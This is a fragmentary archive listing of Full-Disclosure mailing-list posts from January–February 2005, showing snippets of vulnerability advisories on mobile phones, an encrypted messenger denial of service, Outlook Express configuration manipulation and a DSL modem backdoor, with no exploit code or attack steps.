ces: T68, T68i, R520m, T610, Z1010, Z600 Motorola stated that they are committed to fixing the problem, but further details are unknown. Known affected devices: V80, V5xx, V6xx and E398. I hope this is useful, and I wish you all a safe, happy and secure New Year! cheers, Adam

[Full-Disclosure] Encrypted Messenger DoS Vulnerability

2005-01-10 Thread Adam Baldwin
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * Title: Encrypted Messenger Remote DoS Vulnerability Vendor Homepage: http://www.johnytech.com Discovered by: Adam Baldwin ([EMAIL PROTECTED]) www.evilpacket.net\advisories\EP-000-0001.html Discovery Date: 1.6.2005

[Full-Disclosure] University of Phoenix - Outlook Express Unauthorized Configuration Manipulation

2005-01-31 Thread Adam Baldwin
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * University of Phoenix Outlook Express Unauthorized Configuration Manipulation Vendor Homepage: http://www.phoenix.edu Discovered by: Adam Baldwin ([EMAIL PROTECTED]) www.evilpacket.net\advisories\EP-000-0002.html

Re: [Full-Disclosure] some interresting project i just stumbled across...

2005-02-04 Thread Adam Hunt
or of this mail will take possible legal actions against the abuse. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Adam Hunt Director FreeTradeCampus.org [EMAIL PROTECTED] ___

[Full-Disclosure] yet another DSL modem backdoor - Mentor (Conexant)

2005-02-09 Thread Adam Laurie
t to a black hole. If your ISP has shipped you one of these, *TELL* them! Maybe they have enough purchasing power to get it sorted... cheers, Adam -- Adam Laurie Tel: +44 (20) 7605 7000 The Bunker Secure Hosting Ltd. Fax: +44 (20) 7605 7099 Shepherds Building

  1   2   >